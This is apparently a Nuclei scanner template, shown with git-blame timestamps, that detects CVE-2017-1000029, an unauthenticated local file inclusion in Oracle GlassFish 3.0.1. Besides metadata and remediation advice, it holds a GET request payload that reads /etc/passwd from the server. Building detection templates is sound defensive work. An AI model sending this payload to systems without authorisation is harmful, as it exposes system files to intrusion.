2022-04-05 10:33:13 +00:00
id : CVE-2017-1000029
2022-04-22 10:38:41 +00:00
2022-04-05 10:33:13 +00:00
info :
2022-06-09 20:35:21 +00:00
name : Oracle GlassFish Server Open Source Edition 3.0.1 - Local File Inclusion
2022-04-05 10:33:13 +00:00
author : 0x_Akoko
severity : high
2022-06-09 20:35:21 +00:00
description : Oracle GlassFish Server Open Source Edition 3.0.1 (build 22) is vulnerable to unauthenticated local file inclusion vulnerabilities that allow remote attackers to request arbitrary files on the server.
2023-09-06 13:22:34 +00:00
remediation : |
Apply the latest patches and updates provided by Oracle to fix the LFI vulnerability in GlassFish Server.
2022-04-05 10:33:13 +00:00
reference :
- https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18784
2022-05-17 09:18:12 +00:00
- https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-011/?fid=8037
2022-06-09 20:35:21 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2017-1000029
2022-04-05 10:33:13 +00:00
classification :
2022-05-17 09:18:12 +00:00
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-04-05 10:33:13 +00:00
cvss-score : 7.5
cve-id : CVE-2017-1000029
cwe-id : CWE-200
2023-07-11 19:49:27 +00:00
epss-score : 0.00387
2023-08-31 11:46:18 +00:00
epss-percentile : 0.69803
2023-09-06 13:22:34 +00:00
cpe : cpe:2.3:a:oracle:glassfish_server:3.0.1:*:*:*:open_source:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : oracle
product : glassfish_server
tags : cve,cve2017,glassfish,oracle,lfi
2022-04-05 10:33:13 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-04-05 10:33:13 +00:00
- method : GET
path :
- "{{BaseURL}}/resource/file%3a///etc/passwd/"
matchers-condition : and
matchers :
- type : regex
regex :
2022-04-05 17:24:06 +00:00
- "root:[x*]:0:0:"
2022-04-05 10:33:13 +00:00
- type : status
status :
- 200